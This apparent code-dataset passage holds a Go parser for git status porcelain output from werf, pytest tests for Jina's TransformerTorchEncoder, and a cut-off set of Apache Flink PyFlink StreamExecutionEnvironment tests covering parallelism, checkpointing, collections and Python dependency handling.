type ordinaryEntry struct {
xy string
sub string
mh, mi, mw string
hH, hI string
path string
raw string
}
// 1 <XY> <sub> <mH> <mI> <mW> <hH> <hI> <path>
func parseOrdinaryEntry(r *Result, entryLine string) error {
fields := strings.Split(entryLine, " ")
entry := ordinaryEntry{
xy: fields[1],
sub: fields[2],
mh: fields[3],
mi: fields[4],
mw: fields[5],
hH: fields[6],
hI: fields[7],
path: strings.Join(fields[8:], " "), // name with spaces
raw: entryLine,
}
switch {
case entry.sub == "N...":
return parseOrdinaryRegularFileEntry(r, entry)
case entry.sub[0] == 'S':
return parseOrdinarySubmoduleEntry(r, entry)
default:
return fmt.Errorf("invalid git status ordinary <sub> field: %q (%q)", entry.raw, entry.sub)
}
}
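// For reference, a sample porcelain v2 ordinary entry and how it maps onto the
// fields parsed above (hashes shortened for readability):
//
//	1 .M N... 100644 100644 100644 e69de29.. e69de29.. docs/README.md
//	  XY sub  mH     mI     mW     hH        hI        path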
// 1 <XY> N... <mH> <mI> <mW> <hH> <hI> <path>
func parseOrdinaryRegularFileEntry(result *Result, entry ordinaryEntry) error {
if len(entry.xy) != 2 {
return fmt.Errorf("invalid git status ordinary <XY> field: %q (%q)", entry.raw, entry.xy)
}
stageCode := entry.xy[0]
worktreeCode := entry.xy[1]
if stageCode != '.' {
result.Index.pathList = append(result.Index.pathList, entry.path)
result.Index.addToChecksum(entry.path, entry.mi, entry.hI)
}
if worktreeCode != '.' {
result.Worktree.pathList = append(result.Worktree.pathList, entry.path)
}
return nil
}
// 1 <XY> <sub> <mH> <mI> <mW> <hH> <hI> <path>
// 1 <XY> S<c><m><u> <mH> <mI> <mW> <hH> <hI> <path>
func parseOrdinarySubmoduleEntry(result *Result, entry ordinaryEntry) error {
if len(entry.sub) != 4 {
return fmt.Errorf("invalid git status ordinary <sub> field: %q (%q)", entry.raw, entry.sub)
}
stageCode := entry.xy[0]
worktreeCode := entry.xy[1]
commitChangedCode := entry.sub[1]
trackedChangesCode := entry.sub[2]
untrackedChangesCode := entry.sub[3]
newSubmoduleFunc := func(scopeCode uint8) submodule {
return submodule{
Path: entry.path,
IsAdded: scopeCode == 'A',
IsDeleted: scopeCode == 'D',
IsModified: scopeCode == 'M',
IsCommitChanged: commitChangedCode != '.',
HasTrackedChanges: trackedChangesCode != '.',
HasUntrackedChanges: untrackedChangesCode != '.',
}
}
if stageCode != '.' {
result.Index.submodules = append(result.Index.submodules, newSubmoduleFunc(stageCode))
result.Index.addToChecksum(entry.path, entry.mi, entry.hI)
}
if worktreeCode != '.' {
result.Worktree.submodules = append(result.Worktree.submodules, newSubmoduleFunc(worktreeCode))
}
return nil
}
type unmergedEntry struct {
xy string
sub string
m1, m2, m3, mW string
h1, h2, h3 string
path string
raw string
}
// u <xy> <sub> <m1> <m2> <m3> <mW> <h1> <h2> <h3> <path>
func parseUnmergedEntry(result *Result, entryLine string) error {
fields := strings.Fields(entryLine)
entry := unmergedEntry{
xy: fields[1],
sub: fields[2],
m1: fields[3],
m2: fields[4],
m3: fields[5],
mW: fields[6],
h1: fields[7],
h2: fields[8],
h3: fields[9],
path: strings.Join(fields[10:], " "), // name with spaces
raw: entryLine,
}
if len(entry.xy) != 2 {
return fmt.Errorf("invalid git status ordinary <XY> field: %q (%q)", entry.raw, entry.xy)
}
stageCode := entry.xy[0]
worktreeCode := entry.xy[1]
if stageCode != '.' {
result.Index.pathList = append(result.Index.pathList, entry.path)
result.Index.addToChecksum(entry.path)
}
if worktreeCode != '.' {
result.Worktree.pathList = append(result.Worktree.pathList, entry.path)
}
return nil
}
type untrackedEntry struct {
path string
raw string
}
// ? <path>
func parseUntrackedEntry(result *Result, entryLine string) error {
fields := strings.Fields(entryLine)
entry := untrackedEntry{
path: strings.Join(fields[1:], " "), // name with spaces
raw: entryLine,
}
result.UntrackedPathList = append(result.UntrackedPathList, entry.path)
return nil
}
func debug() bool {
return os.Getenv("WERF_DEBUG_GIT_STATUS") == "1"
}
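// Debug output for this package is toggled via the environment, e.g.:
//
//	WERF_DEBUG_GIT_STATUS=1 werf build
//
// (the werf invocation is illustrative; any command that reaches this package
// picks the variable up).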
| [
"\"WERF_DEBUG_GIT_STATUS\""
] | [] | [
"WERF_DEBUG_GIT_STATUS"
] | [] | ["WERF_DEBUG_GIT_STATUS"] | go | 1 | 0 | |
encoders/nlp/TransformerTorchEncoder/tests/test_transformertorchencoder.py | import os
import numpy as np
import pytest
from jina.executors import BaseExecutor
from jina.executors.metas import get_default_metas
from .. import TransformerTorchEncoder
@pytest.fixture(scope='function')
def test_metas(tmp_path):
metas = get_default_metas()
metas['workspace'] = str(tmp_path)
if 'JINA_TEST_GPU' in os.environ:
metas['on_gpu'] = True
yield metas
def get_encoder(test_metas, **kwargs):
if 'pretrained_model_name_or_path' in kwargs and 'pooling_strategy' in kwargs:
kwargs['model_save_path'] = (
kwargs['pretrained_model_name_or_path'].replace('/', '.')
+ f'-{kwargs["pooling_strategy"]}'
)
return TransformerTorchEncoder(metas=test_metas, **kwargs)
_models = [
'sentence-transformers/distilbert-base-nli-stsb-mean-tokens',
'sentence-transformers/bert-base-nli-stsb-mean-tokens',
'deepset/roberta-base-squad2',
'xlm-roberta-base',
'xlnet-base-cased',
]
def _assert_params_equal(params_dict: dict, encoder: TransformerTorchEncoder):
for key, val in params_dict.items():
assert val == getattr(encoder, key)
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['cls', 'mean', 'max'])
@pytest.mark.parametrize('layer_index', [-1, -2, 0])
def test_encoding_results(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index
}
encoder = get_encoder(test_metas, **params)
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
encoded_data = encoder.encode(test_data)
hidden_dim_sizes = {
'sentence-transformers/distilbert-base-nli-stsb-mean-tokens': 768,
'sentence-transformers/bert-base-nli-stsb-mean-tokens': 768,
'deepset/roberta-base-squad2': 768,
'xlm-roberta-base': 768,
'xlnet-base-cased': 768,
}
hidden_dim_size = hidden_dim_sizes[encoder.pretrained_model_name_or_path]
assert encoded_data.shape == (2, hidden_dim_size)
if encoder.pooling_strategy != 'cls' or encoder.layer_index != 0:
assert not np.allclose(encoded_data[0], encoded_data[1], rtol=1)
else:
assert np.allclose(encoded_data[0], encoded_data[1], atol=1e-5, rtol=1e-4)
@pytest.mark.parametrize('acceleration', ['amp', 'quant'])
def test_encoding_results_acceleration(test_metas, acceleration):
if 'JINA_TEST_GPU' in os.environ and acceleration == 'quant':
pytest.skip("Can't test quantization on GPU.")
encoder = get_encoder(test_metas, **{"acceleration": acceleration})
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
encoded_data = encoder.encode(test_data)
assert encoded_data.shape == (2, 768)
assert not np.allclose(encoded_data[0], encoded_data[1], rtol=1)
@pytest.mark.parametrize('model_name', ['bert-base-uncased'])
@pytest.mark.parametrize('pooling_strategy', ['cls', 'mean', 'max'])
@pytest.mark.parametrize('layer_index', [-1, -2])
def test_embedding_consistency(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index,
}
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
encoder = get_encoder(test_metas, **params)
encoded_data = encoder.encode(test_data)
encoded_data_file = f'tests/{model_name}-{pooling_strategy}-{layer_index}.npy'
enc_data_loaded = np.load(encoded_data_file)
np.testing.assert_allclose(encoded_data, enc_data_loaded, atol=1e-5, rtol=1e-6)
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['cls', 'mean', 'max'])
@pytest.mark.parametrize('layer_index', [-1])
def test_max_length_truncation(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index,
'max_length': 3
}
encoder = get_encoder(test_metas, **params)
test_data = np.array(['it is a very good day!', 'it is a very sunny day!'])
encoded_data = encoder.encode(test_data)
np.testing.assert_allclose(encoded_data[0], encoded_data[1], atol=1e-5, rtol=1e-4)
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['cls', 'mean', 'max'])
@pytest.mark.parametrize('layer_index', [-1, -2])
def test_shape_single_document(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index,
'max_length': 3
}
encoder = get_encoder(test_metas, **params)
test_data = np.array(['it is a very good day!'])
encoded_data = encoder.encode(test_data)
assert len(encoded_data.shape) == 2
assert encoded_data.shape[0] == 1
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['min'])
@pytest.mark.parametrize('layer_index', [-2])
def test_save_and_load(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index
}
encoder = get_encoder(test_metas, **params)
encoder.save_config()
_assert_params_equal(params, encoder)
assert os.path.exists(encoder.config_abspath)
test_data = np.array(['a', 'b', 'c', 'x', '!'])
encoded_data_control = encoder.encode(test_data)
encoder.touch()
encoder.save()
assert os.path.exists(encoder.save_abspath)
encoder_loaded = BaseExecutor.load(encoder.save_abspath)
_assert_params_equal(params, encoder_loaded)
encoded_data_test = encoder_loaded.encode(test_data)
np.testing.assert_array_equal(encoded_data_control, encoded_data_test)
@pytest.mark.parametrize('model_name', _models)
@pytest.mark.parametrize('pooling_strategy', ['min'])
@pytest.mark.parametrize('layer_index', [-2])
def test_save_and_load_config(test_metas, model_name, pooling_strategy, layer_index):
params = {
'pretrained_model_name_or_path': model_name,
'pooling_strategy': pooling_strategy,
'layer_index': layer_index
}
encoder = get_encoder(test_metas, **params)
encoder.save_config()
_assert_params_equal(params, encoder)
assert os.path.exists(encoder.config_abspath)
encoder_loaded = BaseExecutor.load_config(encoder.config_abspath)
_assert_params_equal(params, encoder_loaded)
@pytest.mark.parametrize('layer_index', [-100, 100])
def test_wrong_layer_index(test_metas, layer_index):
params = {'layer_index': layer_index}
encoder = get_encoder(test_metas, **params)
encoder.layer_index = layer_index
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
with pytest.raises(ValueError):
encoded_data = encoder.encode(test_data)
def test_wrong_pooling_strategy():
with pytest.raises(NotImplementedError):
TransformerTorchEncoder(pooling_strategy='wrong')
def test_wrong_pooling_acceleration():
with pytest.raises(NotImplementedError):
TransformerTorchEncoder(acceleration='wrong')
@pytest.mark.parametrize(
'params',
[{'pooling_strategy': 'cls', 'pretrained_model_name_or_path': 'gpt2'}],
)
def test_no_cls_token(test_metas, params):
encoder = get_encoder(test_metas, **params)
test_data = np.array(['it is a good day!', 'the dog sits on the floor.'])
with pytest.raises(ValueError):
encoder.encode(test_data)
| [] | [] | [] | [] | [] | python | 0 | 0 | |
flink-python/pyflink/datastream/tests/test_stream_execution_environment.py | ################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import datetime
import decimal
import glob
import json
import os
import shutil
import tempfile
import time
import unittest
import uuid
from pyflink.common import ExecutionConfig, RestartStrategies
from pyflink.common.serialization import JsonRowDeserializationSchema
from pyflink.common.typeinfo import Types
from pyflink.datastream import (StreamExecutionEnvironment, CheckpointConfig,
CheckpointingMode, MemoryStateBackend, TimeCharacteristic)
from pyflink.datastream.connectors import FlinkKafkaConsumer
from pyflink.datastream.execution_mode import RuntimeExecutionMode
from pyflink.datastream.functions import SourceFunction
from pyflink.datastream.tests.test_util import DataStreamTestSinkFunction
from pyflink.find_flink_home import _find_flink_source_root
from pyflink.java_gateway import get_gateway
from pyflink.pyflink_gateway_server import on_windows
from pyflink.table import DataTypes, CsvTableSource, CsvTableSink, StreamTableEnvironment
from pyflink.testing.test_case_utils import PyFlinkTestCase, exec_insert_table, \
invoke_java_object_method
class StreamExecutionEnvironmentTests(PyFlinkTestCase):
def setUp(self):
self.env = StreamExecutionEnvironment.get_execution_environment()
self.env.set_parallelism(2)
self.test_sink = DataStreamTestSinkFunction()
def test_get_config(self):
execution_config = self.env.get_config()
self.assertIsInstance(execution_config, ExecutionConfig)
def test_get_set_parallelism(self):
self.env.set_parallelism(10)
parallelism = self.env.get_parallelism()
self.assertEqual(parallelism, 10)
def test_get_set_buffer_timeout(self):
self.env.set_buffer_timeout(12000)
timeout = self.env.get_buffer_timeout()
self.assertEqual(timeout, 12000)
def test_get_set_default_local_parallelism(self):
self.env.set_default_local_parallelism(8)
parallelism = self.env.get_default_local_parallelism()
self.assertEqual(parallelism, 8)
def test_set_get_restart_strategy(self):
self.env.set_restart_strategy(RestartStrategies.no_restart())
restart_strategy = self.env.get_restart_strategy()
self.assertEqual(restart_strategy, RestartStrategies.no_restart())
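        # Beyond no_restart(), the setter accepts the other factory methods on
        # RestartStrategies as well; a sketch with arbitrary values (3 attempts,
        # 10s between them):
        #
        #   self.env.set_restart_strategy(RestartStrategies.fixed_delay_restart(3, 10000))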
def test_add_default_kryo_serializer(self):
self.env.add_default_kryo_serializer(
"org.apache.flink.runtime.state.StateBackendTestBase$TestPojo",
"org.apache.flink.runtime.state.StateBackendTestBase$CustomKryoTestSerializer")
class_dict = self.env.get_config().get_default_kryo_serializer_classes()
self.assertEqual(class_dict,
{'org.apache.flink.runtime.state.StateBackendTestBase$TestPojo':
'org.apache.flink.runtime.state'
'.StateBackendTestBase$CustomKryoTestSerializer'})
def test_register_type_with_kryo_serializer(self):
self.env.register_type_with_kryo_serializer(
"org.apache.flink.runtime.state.StateBackendTestBase$TestPojo",
"org.apache.flink.runtime.state.StateBackendTestBase$CustomKryoTestSerializer")
class_dict = self.env.get_config().get_registered_types_with_kryo_serializer_classes()
self.assertEqual(class_dict,
{'org.apache.flink.runtime.state.StateBackendTestBase$TestPojo':
'org.apache.flink.runtime.state'
'.StateBackendTestBase$CustomKryoTestSerializer'})
def test_register_type(self):
self.env.register_type("org.apache.flink.runtime.state.StateBackendTestBase$TestPojo")
type_list = self.env.get_config().get_registered_pojo_types()
self.assertEqual(type_list,
['org.apache.flink.runtime.state.StateBackendTestBase$TestPojo'])
def test_get_set_max_parallelism(self):
self.env.set_max_parallelism(12)
parallelism = self.env.get_max_parallelism()
self.assertEqual(parallelism, 12)
def test_set_runtime_mode(self):
self.env.set_runtime_mode(RuntimeExecutionMode.BATCH)
config = invoke_java_object_method(
self.env._j_stream_execution_environment, "getConfiguration")
runtime_mode = config.getValue(
get_gateway().jvm.org.apache.flink.configuration.ExecutionOptions.RUNTIME_MODE)
self.assertEqual(runtime_mode, "BATCH")
def test_operation_chaining(self):
self.assertTrue(self.env.is_chaining_enabled())
self.env.disable_operator_chaining()
self.assertFalse(self.env.is_chaining_enabled())
def test_get_checkpoint_config(self):
checkpoint_config = self.env.get_checkpoint_config()
self.assertIsInstance(checkpoint_config, CheckpointConfig)
def test_get_set_checkpoint_interval(self):
self.env.enable_checkpointing(30000)
interval = self.env.get_checkpoint_interval()
self.assertEqual(interval, 30000)
def test_get_set_checkpointing_mode(self):
mode = self.env.get_checkpointing_mode()
self.assertEqual(mode, CheckpointingMode.EXACTLY_ONCE)
self.env.enable_checkpointing(30000, CheckpointingMode.AT_LEAST_ONCE)
mode = self.env.get_checkpointing_mode()
self.assertEqual(mode, CheckpointingMode.AT_LEAST_ONCE)
def test_get_state_backend(self):
state_backend = self.env.get_state_backend()
self.assertIsNone(state_backend)
def test_set_state_backend(self):
input_backend = MemoryStateBackend()
self.env.set_state_backend(input_backend)
output_backend = self.env.get_state_backend()
self.assertEqual(output_backend._j_memory_state_backend,
input_backend._j_memory_state_backend)
def test_get_set_stream_time_characteristic(self):
default_time_characteristic = self.env.get_stream_time_characteristic()
self.assertEqual(default_time_characteristic, TimeCharacteristic.EventTime)
self.env.set_stream_time_characteristic(TimeCharacteristic.ProcessingTime)
time_characteristic = self.env.get_stream_time_characteristic()
self.assertEqual(time_characteristic, TimeCharacteristic.ProcessingTime)
@unittest.skip("Python API does not support DataStream now. refactor this test later")
def test_get_execution_plan(self):
tmp_dir = tempfile.gettempdir()
source_path = os.path.join(tmp_dir + '/streaming.csv')
tmp_csv = os.path.join(tmp_dir + '/streaming2.csv')
field_names = ["a", "b", "c"]
field_types = [DataTypes.INT(), DataTypes.STRING(), DataTypes.STRING()]
t_env = StreamTableEnvironment.create(self.env)
csv_source = CsvTableSource(source_path, field_names, field_types)
t_env.register_table_source("Orders", csv_source)
t_env.register_table_sink(
"Results",
CsvTableSink(field_names, field_types, tmp_csv))
t_env.from_path("Orders").execute_insert("Results").wait()
plan = self.env.get_execution_plan()
json.loads(plan)
def test_execute(self):
tmp_dir = tempfile.gettempdir()
field_names = ['a', 'b', 'c']
field_types = [DataTypes.BIGINT(), DataTypes.STRING(), DataTypes.STRING()]
t_env = StreamTableEnvironment.create(self.env)
t_env.register_table_sink(
'Results',
CsvTableSink(field_names, field_types,
os.path.join('{}/{}.csv'.format(tmp_dir, round(time.time())))))
execution_result = exec_insert_table(
t_env.from_elements([(1, 'Hi', 'Hello')], ['a', 'b', 'c']),
'Results')
self.assertIsNotNone(execution_result.get_job_id())
self.assertIsNotNone(execution_result.get_net_runtime())
self.assertEqual(len(execution_result.get_all_accumulator_results()), 0)
self.assertIsNone(execution_result.get_accumulator_result('accumulator'))
self.assertIsNotNone(str(execution_result))
def test_from_collection_without_data_types(self):
ds = self.env.from_collection([(1, 'Hi', 'Hello'), (2, 'Hello', 'Hi')])
ds.add_sink(self.test_sink)
self.env.execute("test from collection")
results = self.test_sink.get_results(True)
        # When the user does not specify data types for the input data, the
        # collected results should be in the same tuple format as the inputs.
expected = ["(1, 'Hi', 'Hello')", "(2, 'Hello', 'Hi')"]
results.sort()
expected.sort()
self.assertEqual(expected, results)
def test_from_collection_with_data_types(self):
# verify from_collection for the collection with single object.
ds = self.env.from_collection(['Hi', 'Hello'], type_info=Types.STRING())
ds.add_sink(self.test_sink)
self.env.execute("test from collection with single object")
results = self.test_sink.get_results(False)
expected = ['Hello', 'Hi']
results.sort()
expected.sort()
self.assertEqual(expected, results)
# verify from_collection for the collection with multiple objects like tuple.
ds = self.env.from_collection([(1, None, 1, True, 32767, -2147483648, 1.23, 1.98932,
bytearray(b'flink'), 'pyflink', datetime.date(2014, 9, 13),
datetime.time(hour=12, minute=0, second=0,
microsecond=123000),
datetime.datetime(2018, 3, 11, 3, 0, 0, 123000), [1, 2, 3],
decimal.Decimal('1000000000000000000.05'),
decimal.Decimal('1000000000000000000.0599999999999'
'9999899999999999')),
(2, None, 2, True, 43878, 9147483648, 9.87, 2.98936,
bytearray(b'flink'), 'pyflink', datetime.date(2015, 10, 14),
datetime.time(hour=11, minute=2, second=2,
microsecond=234500),
datetime.datetime(2020, 4, 15, 8, 2, 6, 235000), [2, 4, 6],
decimal.Decimal('2000000000000000000.74'),
decimal.Decimal('2000000000000000000.061111111111111'
'11111111111111'))],
type_info=Types.ROW(
[Types.LONG(), Types.LONG(), Types.SHORT(),
Types.BOOLEAN(), Types.SHORT(), Types.INT(),
Types.FLOAT(), Types.DOUBLE(),
Types.PICKLED_BYTE_ARRAY(),
Types.STRING(), Types.SQL_DATE(), Types.SQL_TIME(),
Types.SQL_TIMESTAMP(),
Types.BASIC_ARRAY(Types.LONG()), Types.BIG_DEC(),
Types.BIG_DEC()]))
ds.add_sink(self.test_sink)
self.env.execute("test from collection with tuple object")
results = self.test_sink.get_results(False)
        # If the user specifies data types for the input data, the collected results should be in row format.
expected = [
'+I[1, null, 1, true, 32767, -2147483648, 1.23, 1.98932, [102, 108, 105, 110, 107], '
'pyflink, 2014-09-13, 12:00:00, 2018-03-11 03:00:00.123, [1, 2, 3], '
'1000000000000000000.05, 1000000000000000000.05999999999999999899999999999]',
'+I[2, null, 2, true, -21658, 557549056, 9.87, 2.98936, [102, 108, 105, 110, 107], '
'pyflink, 2015-10-14, 11:02:02, 2020-04-15 08:02:06.235, [2, 4, 6], '
'2000000000000000000.74, 2000000000000000000.06111111111111111111111111111]']
results.sort()
expected.sort()
self.assertEqual(expected, results)
def test_add_custom_source(self):
custom_source = SourceFunction("org.apache.flink.python.util.MyCustomSourceFunction")
ds = self.env.add_source(custom_source, type_info=Types.ROW([Types.INT(), Types.STRING()]))
ds.add_sink(self.test_sink)
self.env.execute("test add custom source")
results = self.test_sink.get_results(False)
expected = [
'+I[3, Mike]',
'+I[1, Marry]',
'+I[4, Ted]',
'+I[5, Jack]',
'+I[0, Bob]',
'+I[2, Henry]']
results.sort()
expected.sort()
self.assertEqual(expected, results)
def test_read_text_file(self):
texts = ["Mike", "Marry", "Ted", "Jack", "Bob", "Henry"]
text_file_path = self.tempdir + '/text_file'
with open(text_file_path, 'a') as f:
for text in texts:
f.write(text)
f.write('\n')
ds = self.env.read_text_file(text_file_path)
ds.add_sink(self.test_sink)
self.env.execute("test read text file")
results = self.test_sink.get_results()
results.sort()
texts.sort()
self.assertEqual(texts, results)
def test_execute_async(self):
ds = self.env.from_collection([(1, 'Hi', 'Hello'), (2, 'Hello', 'Hi')],
type_info=Types.ROW(
[Types.INT(), Types.STRING(), Types.STRING()]))
ds.add_sink(self.test_sink)
job_client = self.env.execute_async("test execute async")
job_id = job_client.get_job_id()
self.assertIsNotNone(job_id)
execution_result = job_client.get_job_execution_result().result()
self.assertEqual(str(job_id), str(execution_result.get_job_id()))
def test_add_python_file(self):
import uuid
python_file_dir = os.path.join(self.tempdir, "python_file_dir_" + str(uuid.uuid4()))
os.mkdir(python_file_dir)
python_file_path = os.path.join(python_file_dir, "test_stream_dependency_manage_lib.py")
with open(python_file_path, 'w') as f:
f.write("def add_two(a):\n return a + 2")
def plus_two_map(value):
from test_stream_dependency_manage_lib import add_two
return add_two(value)
self.env.add_python_file(python_file_path)
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(plus_two_map).add_sink(self.test_sink)
self.env.execute("test add python file")
result = self.test_sink.get_results(True)
expected = ['3', '4', '5', '6', '7']
result.sort()
expected.sort()
self.assertEqual(expected, result)
def test_set_requirements_without_cached_directory(self):
import uuid
requirements_txt_path = os.path.join(self.tempdir, str(uuid.uuid4()))
with open(requirements_txt_path, 'w') as f:
f.write("cloudpickle==1.2.2")
self.env.set_python_requirements(requirements_txt_path)
def check_requirements(i):
import cloudpickle
assert os.path.abspath(cloudpickle.__file__).startswith(
os.environ['_PYTHON_REQUIREMENTS_INSTALL_DIR'])
return i
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(check_requirements).add_sink(self.test_sink)
self.env.execute("test set requirements without cache dir")
result = self.test_sink.get_results(True)
expected = ['1', '2', '3', '4', '5']
result.sort()
expected.sort()
self.assertEqual(expected, result)
def test_set_requirements_with_cached_directory(self):
import uuid
tmp_dir = self.tempdir
requirements_txt_path = os.path.join(tmp_dir, "requirements_txt_" + str(uuid.uuid4()))
with open(requirements_txt_path, 'w') as f:
f.write("python-package1==0.0.0")
requirements_dir_path = os.path.join(tmp_dir, "requirements_dir_" + str(uuid.uuid4()))
os.mkdir(requirements_dir_path)
package_file_name = "python-package1-0.0.0.tar.gz"
with open(os.path.join(requirements_dir_path, package_file_name), 'wb') as f:
import base64
# This base64 data is encoded from a python package file which includes a
# "python_package1" module. The module contains a "plus(a, b)" function.
            # The base64 can be recomputed with the following code:
# base64.b64encode(open("python-package1-0.0.0.tar.gz", "rb").read()).decode("utf-8")
f.write(base64.b64decode(
"H4sICNefrV0C/2Rpc3QvcHl0aG9uLXBhY2thZ2UxLTAuMC4wLnRhcgDtmVtv2jAYhnPtX2H1CrRCY+ckI"
"XEx7axuUA11u5imyICTRc1JiVnHfv1MKKWjYxwKEdPehws7xkmUfH5f+3PyqfqWpa1cjG5EKFnLbOvfhX"
"FQTI3nOPPSdavS5Pa8nGMwy3Esi3ke9wyTObbnGNQxamBSKlFQavzUryG8ldG6frpbEGx4yNmDLMp/hPy"
"P8b+6fNN613vdP1z8XdteG3+ug/17/F3Hcw1qIv5H54NUYiyUaH2SRRllaYeytkl6IpEdujI2yH2XapCQ"
"wSRJRDHt0OveZa//uUfeZonUvUO5bHo+0ZcoVo9bMhFRvGx9H41kWj447aUsR0WUq+pui8arWKggK5Jli"
"wGOo/95q79ovXi6/nfyf246Dof/n078fT9KI+X77Xx6BP83bX4Xf5NxT7dz7toO/L8OxjKgeTwpG+KcDp"
"sdQjWFVJMipYI+o0MCk4X/t2UYtqI0yPabCHb3f861XcD/Ty/+Y5nLdCzT0dSPo/SmbKsf6un+b7KV+Ls"
"W4/D/OoC9w/930P9eGwM75//csrD+Q/6P/P/k9D/oX3988Wqw1bS/tf6tR+s/m3EG/ddBqXO9XKf15C8p"
"P9k4HZBtBgzZaVW5vrfKcj+W32W82ygEB9D/Xu9+4/qfP9L/rBv0X1v87yONKRX61/qfzwqjIDzIPTbv/"
"7or3/88i0H/tfBFW7s/s/avRInQH06ieEy7tDrQeYHUdRN7wP+n/vf62LOH/pld7f9xz7a5Pfufedy0oP"
"86iJI8KxStAq6yLC4JWdbbVbWRikR2z1ZGytk5vauW3QdnBFE6XqwmykazCesAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAOBw/AJw5CHBAFAAAA=="))
self.env.set_python_requirements(requirements_txt_path, requirements_dir_path)
def add_one(i):
from python_package1 import plus
return plus(i, 1)
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(add_one).add_sink(self.test_sink)
self.env.execute("test set requirements with cachd dir")
result = self.test_sink.get_results(True)
expected = ['2', '3', '4', '5', '6']
result.sort()
expected.sort()
self.assertEqual(expected, result)
def test_add_python_archive(self):
import uuid
import shutil
tmp_dir = self.tempdir
archive_dir_path = os.path.join(tmp_dir, "archive_" + str(uuid.uuid4()))
os.mkdir(archive_dir_path)
with open(os.path.join(archive_dir_path, "data.txt"), 'w') as f:
f.write("2")
archive_file_path = \
shutil.make_archive(os.path.dirname(archive_dir_path), 'zip', archive_dir_path)
self.env.add_python_archive(archive_file_path, "data")
def add_from_file(i):
with open("data/data.txt", 'r') as f:
return i + int(f.read())
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(add_from_file).add_sink(self.test_sink)
self.env.execute("test set python archive")
result = self.test_sink.get_results(True)
expected = ['3', '4', '5', '6', '7']
result.sort()
expected.sort()
self.assertEqual(expected, result)
@unittest.skipIf(on_windows(), "Symbolic link is not supported on Windows, skipping.")
def test_set_stream_env(self):
import sys
python_exec = sys.executable
tmp_dir = self.tempdir
python_exec_link_path = os.path.join(tmp_dir, "py_exec")
os.symlink(python_exec, python_exec_link_path)
self.env.set_python_executable(python_exec_link_path)
def check_python_exec(i):
import os
assert os.environ["python"] == python_exec_link_path
return i
ds = self.env.from_collection([1, 2, 3, 4, 5])
ds.map(check_python_exec).add_sink(self.test_sink)
self.env.execute("test set python executable")
result = self.test_sink.get_results(True)
expected = ['1', '2', '3', '4', '5']
result.sort()
expected.sort()
self.assertEqual(expected, result)
def test_add_jars(self):
# find kafka connector jars
flink_source_root = _find_flink_source_root()
jars_abs_path = flink_source_root + '/flink-connectors/flink-sql-connector-kafka'
specific_jars = glob.glob(jars_abs_path + '/target/flink*.jar')
specific_jars = ['file://' + specific_jar for specific_jar in specific_jars]
self.env.add_jars(*specific_jars)
source_topic = 'test_source_topic'
props = {'bootstrap.servers': 'localhost:9092', 'group.id': 'test_group'}
type_info = Types.ROW([Types.INT(), Types.STRING()])
# Test for kafka consumer
deserialization_schema = JsonRowDeserializationSchema.builder() \
.type_info(type_info=type_info).build()
        # Will get a ClassNotFoundException if the kafka connector is not added to the pipeline jars.
kafka_consumer = FlinkKafkaConsumer(source_topic, deserialization_schema, props)
self.env.add_source(kafka_consumer).print()
self.env.get_execution_plan()
def test_add_classpaths(self):
# find kafka connector jars
flink_source_root = _find_flink_source_root()
jars_abs_path = flink_source_root + '/flink-connectors/flink-sql-connector-kafka'
specific_jars = glob.glob(jars_abs_path + '/target/flink*.jar')
specific_jars = ['file://' + specific_jar for specific_jar in specific_jars]
self.env.add_classpaths(*specific_jars)
source_topic = 'test_source_topic'
props = {'bootstrap.servers': 'localhost:9092', 'group.id': 'test_group'}
type_info = Types.ROW([Types.INT(), Types.STRING()])
# Test for kafka consumer
deserialization_schema = JsonRowDeserializationSchema.builder() \
.type_info(type_info=type_info).build()
        # It will raise a ClassNotFoundException if the kafka connector is not added into the
        # pipeline classpaths.
kafka_consumer = FlinkKafkaConsumer(source_topic, deserialization_schema, props)
self.env.add_source(kafka_consumer).print()
self.env.get_execution_plan()
def test_generate_stream_graph_with_dependencies(self):
python_file_dir = os.path.join(self.tempdir, "python_file_dir_" + str(uuid.uuid4()))
os.mkdir(python_file_dir)
python_file_path = os.path.join(python_file_dir, "test_stream_dependency_manage_lib.py")
with open(python_file_path, 'w') as f:
f.write("def add_two(a):\n return a + 2")
self.env.add_python_file(python_file_path)
def plus_two_map(value):
from test_stream_dependency_manage_lib import add_two
return value[0], add_two(value[1])
def add_from_file(i):
with open("data/data.txt", 'r') as f:
return i[0], i[1] + int(f.read())
from_collection_source = self.env.from_collection([('a', 0), ('b', 0), ('c', 1), ('d', 1),
('e', 2)],
type_info=Types.ROW([Types.STRING(),
